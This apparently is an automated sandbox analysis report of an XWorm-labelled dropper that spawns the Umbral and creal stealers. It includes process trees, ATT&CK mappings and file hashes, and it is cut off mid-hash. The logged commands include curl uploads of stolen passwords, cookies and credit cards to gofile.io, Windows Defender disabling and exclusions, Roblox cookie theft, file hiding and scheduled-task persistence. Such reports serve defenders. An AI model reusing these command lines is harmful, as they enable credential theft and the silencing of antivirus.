Token: SeSystemEnvironmentPrivilege	2492	wmic.exe
Token: SeRemoteShutdownPrivilege	2492	wmic.exe
Token: SeUndockPrivilege	2492	wmic.exe
Token: SeManageVolumePrivilege	2492	wmic.exe
Token: 33	2492	wmic.exe
Token: 34	2492	wmic.exe
Token: 35	2492	wmic.exe
Token: 36	2492	wmic.exe
Token: SeIncreaseQuotaPrivilege	2492	wmic.exe
Token: SeSecurityPrivilege	2492	wmic.exe
Token: SeTakeOwnershipPrivilege	2492	wmic.exe
Token: SeLoadDriverPrivilege	2492	wmic.exe
Token: SeSystemProfilePrivilege	2492	wmic.exe
Token: SeSystemtimePrivilege	2492	wmic.exe
Token: SeProfSingleProcessPrivilege	2492	wmic.exe
Token: SeIncBasePriorityPrivilege	2492	wmic.exe
Token: SeCreatePagefilePrivilege	2492	wmic.exe
Token: SeBackupPrivilege	2492	wmic.exe
Token: SeRestorePrivilege	2492	wmic.exe
Token: SeShutdownPrivilege	2492	wmic.exe
Token: SeDebugPrivilege	2492	wmic.exe
Token: SeSystemEnvironmentPrivilege	2492	wmic.exe
Token: SeRemoteShutdownPrivilege	2492	wmic.exe
Token: SeUndockPrivilege	2492	wmic.exe
Token: SeManageVolumePrivilege	2492	wmic.exe
Token: 33	2492	wmic.exe
Token: 34	2492	wmic.exe
Token: 35	2492	wmic.exe
Token: 36	2492	wmic.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	3788	powershell.exe
Token: SeIncreaseQuotaPrivilege	4760	wmic.exe
Token: SeSecurityPrivilege	4760	wmic.exe
Token: SeTakeOwnershipPrivilege	4760	wmic.exe
Token: SeLoadDriverPrivilege	4760	wmic.exe
Token: SeSystemProfilePrivilege	4760	wmic.exe
Token: SeSystemtimePrivilege	4760	wmic.exe
Token: SeProfSingleProcessPrivilege	4760	wmic.exe
Token: SeIncBasePriorityPrivilege	4760	wmic.exe
Token: SeCreatePagefilePrivilege	4760	wmic.exe
Token: SeBackupPrivilege	4760	wmic.exe
Token: SeRestorePrivilege	4760	wmic.exe
Token: SeShutdownPrivilege	4760	wmic.exe
Token: SeDebugPrivilege	4760	wmic.exe
Token: SeSystemEnvironmentPrivilege	4760	wmic.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3224	XWorm.exe
4612	Xworm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2000 wrote to memory of 4612	2000	Xworm 5.6.exe	84
PID 2000 wrote to memory of 4612	2000	Xworm 5.6.exe	84
PID 2000 wrote to memory of 2432	2000	Xworm 5.6.exe	85
PID 2000 wrote to memory of 2432	2000	Xworm 5.6.exe	85
PID 2000 wrote to memory of 4784	2000	Xworm 5.6.exe	86
PID 2000 wrote to memory of 4784	2000	Xworm 5.6.exe	86
PID 2000 wrote to memory of 3224	2000	Xworm 5.6.exe	87
PID 2000 wrote to memory of 3224	2000	Xworm 5.6.exe	87
PID 2000 wrote to memory of 3800	2000	Xworm 5.6.exe	88
PID 2000 wrote to memory of 3800	2000	Xworm 5.6.exe	88
PID 2432 wrote to memory of 4136	2432	creal.exe	89
PID 2432 wrote to memory of 4136	2432	creal.exe	89
PID 4136 wrote to memory of 4556	4136	creal.exe	90
PID 4136 wrote to memory of 4556	4136	creal.exe	90
PID 4556 wrote to memory of 4724	4556	cmd.exe	92
PID 4556 wrote to memory of 4724	4556	cmd.exe	92
PID 4784 wrote to memory of 2492	4784	Umbral.exe	94
PID 4784 wrote to memory of 2492	4784	Umbral.exe	94
PID 4784 wrote to memory of 3896	4784	Umbral.exe	96
PID 4784 wrote to memory of 3896	4784	Umbral.exe	96
PID 4784 wrote to memory of 2636	4784	Umbral.exe	98
PID 4784 wrote to memory of 2636	4784	Umbral.exe	98
PID 4784 wrote to memory of 1712	4784	Umbral.exe	104
PID 4784 wrote to memory of 1712	4784	Umbral.exe	104
PID 4784 wrote to memory of 1484	4784	Umbral.exe	106
PID 4784 wrote to memory of 1484	4784	Umbral.exe	106
PID 4784 wrote to memory of 3788	4784	Umbral.exe	108
PID 4784 wrote to memory of 3788	4784	Umbral.exe	108
PID 4784 wrote to memory of 4760	4784	Umbral.exe	111
PID 4784 wrote to memory of 4760	4784	Umbral.exe	111
PID 4784 wrote to memory of 1244	4784	Umbral.exe	113
PID 4784 wrote to memory of 1244	4784	Umbral.exe	113
PID 4784 wrote to memory of 1012	4784	Umbral.exe	115
PID 4784 wrote to memory of 1012	4784	Umbral.exe	115
PID 4784 wrote to memory of 4364	4784	Umbral.exe	117
PID 4784 wrote to memory of 4364	4784	Umbral.exe	117
PID 4784 wrote to memory of 1676	4784	Umbral.exe	119
PID 4784 wrote to memory of 1676	4784	Umbral.exe	119
PID 4784 wrote to memory of 4680	4784	Umbral.exe	123
PID 4784 wrote to memory of 4680	4784	Umbral.exe	123
PID 4680 wrote to memory of 804	4680	cmd.exe	125
PID 4680 wrote to memory of 804	4680	cmd.exe	125
PID 3224 wrote to memory of 1900	3224	XWorm.exe	126
PID 3224 wrote to memory of 1900	3224	XWorm.exe	126
PID 3224 wrote to memory of 3924	3224	XWorm.exe	128
PID 3224 wrote to memory of 3924	3224	XWorm.exe	128
PID 3224 wrote to memory of 3740	3224	XWorm.exe	130
PID 3224 wrote to memory of 3740	3224	XWorm.exe	130
PID 3224 wrote to memory of 4340	3224	XWorm.exe	132
PID 3224 wrote to memory of 4340	3224	XWorm.exe	132
PID 3224 wrote to memory of 1812	3224	XWorm.exe	134
PID 3224 wrote to memory of 1812	3224	XWorm.exe	134
PID 4136 wrote to memory of 4060	4136	creal.exe	140
PID 4136 wrote to memory of 4060	4136	creal.exe	140
PID 4060 wrote to memory of 4752	4060	cmd.exe	142
PID 4060 wrote to memory of 4752	4060	cmd.exe	142
PID 4136 wrote to memory of 1740	4136	creal.exe	145
PID 4136 wrote to memory of 1740	4136	creal.exe	145
PID 1740 wrote to memory of 3900	1740	cmd.exe	147
PID 1740 wrote to memory of 3900	1740	cmd.exe	147
PID 4136 wrote to memory of 3860	4136	creal.exe	148
PID 4136 wrote to memory of 3860	4136	creal.exe	148
PID 3860 wrote to memory of 2976	3860	cmd.exe	150
PID 3860 wrote to memory of 2976	3860	cmd.exe	150

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3896	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Xworm-V5.6\Xworm 5.6.exe
"C:\Users\Admin\AppData\Local\Temp\Xworm-V5.6\Xworm 5.6.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2000
- C:\Users\Admin\AppData\Local\Temp\Xworm-V5.6\Xworm.exe
  "C:\Users\Admin\AppData\Local\Temp\Xworm-V5.6\Xworm.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:4612
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\25nd1pls\25nd1pls.cmdline"
    3⤵
    PID:4024
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF940.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8015EB02A0D94D40B16F72D6EF1F7259.TMP"
      4⤵
      PID:1432
- C:\Users\Admin\AppData\Local\Temp\creal.exe
  "C:\Users\Admin\AppData\Local\Temp\creal.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2432
- - C:\Users\Admin\AppData\Local\Temp\creal.exe
    "C:\Users\Admin\AppData\Local\Temp\creal.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4136
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4556
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4060
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:4752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1740
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:3900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3860
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:2976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:1188
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:3416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:944
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:1596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:2864
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:4604
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4784
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2492
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:3896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3788
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4760
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:1244
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4364
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1676
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4680
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:804
- C:\Users\Admin\AppData\Local\Temp\XWorm.exe
  "C:\Users\Admin\AppData\Local\Temp\XWorm.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\BSOD.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BSOD.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4340
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "BSOD" /tr "C:\Users\Public\BSOD.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1812
- C:\Windows\XWorm.exe
  "C:\Windows\XWorm.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3800

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4472

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x510 0x324
1⤵
PID:4936

C:\Users\Public\BSOD.exe
C:\Users\Public\BSOD.exe
1⤵
- Executes dropped EXE
PID:3380

C:\Users\Public\BSOD.exe
C:\Users\Public\BSOD.exe
1⤵
- Executes dropped EXE
PID:2792

C:\Users\Admin\Desktop\XClient.exe
"C:\Users\Admin\Desktop\XClient.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:2976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2192
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1212
- C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" qc windefend
  2⤵
  - Launches sc.exe
  PID:4964
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
  2⤵
  PID:4884
- C:\Windows\system32\whoami.exe
  "C:\Windows\system32\whoami.exe" /groups
  2⤵
  PID:2588
- C:\Windows\system32\net1.exe
  "C:\Windows\system32\net1.exe" start TrustedInstaller
  2⤵
  PID:2792

C:\Users\Public\BSOD.exe
C:\Users\Public\BSOD.exe
1⤵
- Executes dropped EXE
PID:4968

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Executes dropped EXE
PID:2940

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Modifies data under HKEY_USERS
  PID:3376
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    PID:4236
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    PID:3992
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    PID:4636
- - C:\Windows\system32\net1.exe
    "C:\Windows\system32\net1.exe" stop windefend
    3⤵
    PID:3644
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
    3⤵
    - Launches sc.exe
    PID:1212

C:\Users\Public\BSOD.exe
C:\Users\Public\BSOD.exe
1⤵
- Executes dropped EXE
PID:924

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Executes dropped EXE
PID:4876

C:\Users\Public\BSOD.exe
C:\Users\Public\BSOD.exe
1⤵
- Executes dropped EXE
PID:3416

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Executes dropped EXE
PID:4544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
228KB

MD5
7490f7cc7fe56a351ec6228d6f976b7e

SHA1
25d3d77daf555fafa4ee74bf2552c803ddef0316

SHA256
fdea303425206b38a5f142cf735dd2728bb4ac7665b8172f620166f0a982d756

SHA512
33121e5bb96dcfc6cd59a404b5e04d590b6595ffa5b90313581ad53d92be7bba3375602fd1e9219d60aba220048b928ef0c3539bde87545d922847b666c12b37

Download Submit
C:\Users\Admin\AppData\Local\Temp\Xworm-V5.6\Xworm.exe

Filesize
14.9MB

MD5
56ccb739926a725e78a7acf9af52c4bb

SHA1
5b01b90137871c3c8f0d04f510c4d56b23932cbc

SHA256
90f58865f265722ab007abb25074b3fc4916e927402552c6be17ef9afac96405

SHA512
2fee662bc4a1a36ce7328b23f991fa4a383b628839e403d6eb6a9533084b17699a6c939509867a86e803aafef2f9def98fa9305b576dad754aa7f599920c19a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\VCRUNTIME140.dll

Filesize
93KB

MD5
ade7aac069131f54e4294f722c17a412

SHA1
fede04724bdd280dae2c3ce04db0fe5f6e54988d

SHA256
92d50f7c4055718812cd3d823aa2821d6718eb55d2ab2bac55c2e47260c25a76

SHA512
76a810a41eb739fba2b4c437ed72eda400e71e3089f24c79bdabcb8aab0148d80bd6823849e5392140f423addb7613f0fc83895b9c01e85888d774e0596fc048

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\VCRUNTIME140_1.dll

Filesize
35KB

MD5
4dc09ca657822c2e8160255f767597df

SHA1
d1a553e6cad4600020113fe2887f5deb0db588c8

SHA256
922124ba0821aa864a0261ed88bd25f8e40f94c24d00d389e23cd9ab2bfc6ba4

SHA512
1504a4c32aefb58b20bfeab4f6e45ddb1b4feb08cfc9b6098b0e0b8d770d2ec5cd53a0506f212a2d4f406a1f6aae5bb03bfe8b87f55a61671e9cbbf684d77e19

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_bz2.pyd

Filesize
85KB

MD5
0083b7118baca26c44df117a40b8e974

SHA1
218176d616a57fd2057a34c98f510ac8b7d0f550

SHA256
e1f791a3f5e277880d56f21006cec8e0b93ca50cd4464b2b4c6e88ab3ca5234d

SHA512
e093937e4f1c8e3c321e2059a3dda703f0d3df88deba2b15656bca87a258a9cd4dc677859cb1879157d4e60e10efb4d35c402135960ef2afddfef9c388077b85

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_cffi_backend.cp38-win_amd64.pyd

Filesize
177KB

MD5
77b5d28b725596b08d4393786d98bd27

SHA1
e3f00478de1d28bc7d2e9f0b552778be3e32d43b

SHA256
f7a00ba343d6f1ea8997d95b242fbbd70856ec2b98677d5f8b52921b8658369c

SHA512
d44415d425f7423c3d68df22b72687a2d0da52966952e20d215553aa83de1e7a5192ec918a3d570d6c2362eb5500b56b87e3ffbc0b768bfa064585aea2a30e9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_ctypes.pyd

Filesize
123KB

MD5
9755d3747e407ca70a4855bc9e98cfb9

SHA1
5a1871716715ba7f898afaae8c182bd8199ed60a

SHA256
213937a90b1b91a31d3d4b240129e30f36108f46589ba68cd07920ce18c572c2

SHA512
fb2d709b4a8f718c1ab33a1b65ac990052e3a5a0d8dd57f415b4b12bce95189397bfddb5fb3a7fc1776c191eb92fd28e3aaebbebdf1024ecd99e412376ca4467

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_decimal.pyd

Filesize
262KB

MD5
b6bd7872e7f4c5020bf14906831aec73

SHA1
63911584ea66607c665319dc2143b3c6f92a6aff

SHA256
d0578670b5971f24df1a74c2d33596acaac0d56ef974d178f2744ae1773a6aff

SHA512
86480d265b5dc94e53a53a444a4a23bfc1eae6ac1a9532eb0355759c23072589ed7904807d511f16ff98a0c3499de675c1abfcfe531ec2d02f0b065cbc28452b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_hashlib.pyd

Filesize
46KB

MD5
f6f10f79867e33929e8c3263beaee423

SHA1
91ed04e12da5e5bed607f1957ede5057d78c275f

SHA256
c66d0a524a9d6c7f110273ffb14fb0ead440bf42f7a3957554f8b053331a7c3c

SHA512
30004621f7ee267e18987922b3e4243da6080cc7fcff8caa9cc8fdf795ba156ffba8c163a621959c2696cea6835398b046ff3175c0d02154532a93395391124b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_lzma.pyd

Filesize
159KB

MD5
e63bf80e04ae950ef22d8fc100d6495f

SHA1
f2340ecaa46cb1737abcb19dbab6de9e3cbc51d7

SHA256
f4016a1a8eb34aaf4f20d6c2fdbb02992cc5125f5c32f0335c6dfbeedb9add5c

SHA512
cd70c7c99e5fb131567aa2213abd5f811e2a271ac12a2210be6a04728c696c407814e4535e7ca19ca86a2d3311d822cc6985864a2e178e1b36faf6bc828e621f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_multiprocessing.pyd

Filesize
29KB

MD5
18fd166504c6bd1f60ad3b903e602532

SHA1
019ff28a64b4e1e227d1ee536a8774e441ebaf44

SHA256
a50e38ab8b6c4bfb834c047142f69a08d18a0bcc2f84a5ee81c5627ff5156618

SHA512
5ba1b75f24da3ff4b1babc4bf4ed039e42cea2c2c7dbcf7c9686050c21c3864c576ad80a11cbf47f4bc4073e8ad343ffe9702407a4fd92b07bbf88930596d6bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_queue.pyd

Filesize
28KB

MD5
25e90e7317853c3807893591d72c1c11

SHA1
d6df3b4dd8c6235f263b637ec4646b56c9c977b2

SHA256
72584c4be4e56b0c26023a30385e90a1b5ac3a8d559007d90da11e5262ec7b76

SHA512
6130e9631465ec7b5bc65e29dd23ea99846baf34b55c69b86774e586c193eea2b4c0557f0d3980b317fece7eb1b9a2f612eb48697b5c61850baf16dbcc3f5a87

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_socket.pyd

Filesize
77KB

MD5
ee5c9250e766a02aa745a0d1493a387c

SHA1
0e6e86b7cda5f99e719dab8bdcae21558e7def10

SHA256
28b23ef979ff75b3cc44fce358b7ed087488105e3186249163504cd719567ccf

SHA512
ba4ad7d081b307f220212a9fbf982f925ac742eec64b3c9ed2bdbf3d06a589b1acc992d9585dec077de3b7f9e814a7115470a89307123491a3aff0ac3d795419

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_sqlite3.pyd

Filesize
87KB

MD5
bace6fe8622990c0c9cca00e516f2d08

SHA1
783a36cc60eb14b67b487aecb8b52eae25c9cdd3

SHA256
e6eec0c9672cb975c2688f1b4debff2be2347dd437057411ec591228730cc690

SHA512
